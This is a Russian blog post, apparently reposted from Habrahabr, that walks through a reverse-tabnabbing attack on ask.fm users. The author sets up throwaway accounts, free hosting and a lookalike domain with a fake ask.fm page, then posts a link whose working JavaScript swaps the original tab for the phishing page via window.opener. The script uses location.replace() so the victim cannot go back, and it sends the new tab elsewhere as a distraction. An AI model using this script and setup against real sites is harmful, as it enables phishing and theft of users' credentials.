- PVSM.RU - https://www.pvsm.ru -

Подмена родительской страницы на примере ask.fm

Доброго времени суток!

Буквально год назад я обнаружил интересную особенность у window.opener. Ранее уже писали другие методы взлома через тег , но я покажу на конкретном примере мой метод. Метод заключается в подмене адреса родительской вкладки. Не открытие адреса, который можно исправить путём перехода по истории назад, а именно подмена.
Что же, хватит пустой болтовни, приступим к делу.
Для выполнения задания мне потребуется:

  • 1) учётная запись ask.fm
  • 2) сервис регистрации 10-минутной почты, чтобы на него зарегистрировать аккаунты хостинга [1] и «аска».
  • 3) Собственно бесплатный хостинг [1] с возможностью выполнения PHP-скриптов
  • 4) Пару минут свободного времени и стакан кофе.

Приступим…

Для начала зарегаем хостинг [1] и учётную запись на ask.fm. Домен я выбрал askfn.esy.es [2] а имя учётной записи ask.fm/forhabrahabr [3]
Переход по ссылкам в аск.фм идёт только в поле ответа, поэтому задаём любой вопрос и отвечаем на него ссылкой. Самое смешное, что когда я регистрировал тестовый аккаунт и ответил, то сразу же получил два «лайка». Видать людям вообще без разницы что «лайкать», лишь бы привлечь к себе внимание…
Продолжим…
Для самого теста, я написал простенький фейк страницы аск. фм и залил его в директорию askfm. а на главной поставил собственно сам скрипт редиректа и подмены родительской вкладки.

Его код

<html>
<head>
<title></title>
</head>
<body>
<script language="JavaScript">
   if(parent.window.opener) parent.window.opener.location.replace("http://askfn.esy.es/askfm"); //Здесь адрес, куда направить пользователя (фейк).
   document.location.href = "http://habrahabr.ru/"; //адрес, куда направить юзера для отвода глаз
</script>
</body>
</html>

ВАЖНО!!! В скрипте используется replace() для того, чтобы юзер в случае испуга, нажимая кнопку назад в браузере, не перешёл обратно на ask.fm. Таким образом история посещений якобы очищается.
ВАЖНО2!!! Замена родительской вкладки работает лишь при прямом открытии ссылки… То есть открытие в новой вкладке и «нажатием по колёсику» не изменит родительскую вкладку

Итак, выглядит наша ссылка вот так
image
А после перехода по ссылке
image

Собственно вот «ссылка на ссылку»:
Ask.fm [3]

Автор:

Источник [4]

Сайт-источник PVSM.RU: https://www.pvsm.ru

Путь до страницы источника: https://www.pvsm.ru/javascript/64013

Ссылки в тексте:

[1] хостинга: https://www.reg.ru/?rlink=reflink-717

[2] askfn.esy.es: http://askfn.esy.es

[3] ask.fm/forhabrahabr: http://ask.fm/forhabrahabr

[4] Источник: http://habrahabr.ru/post/228341/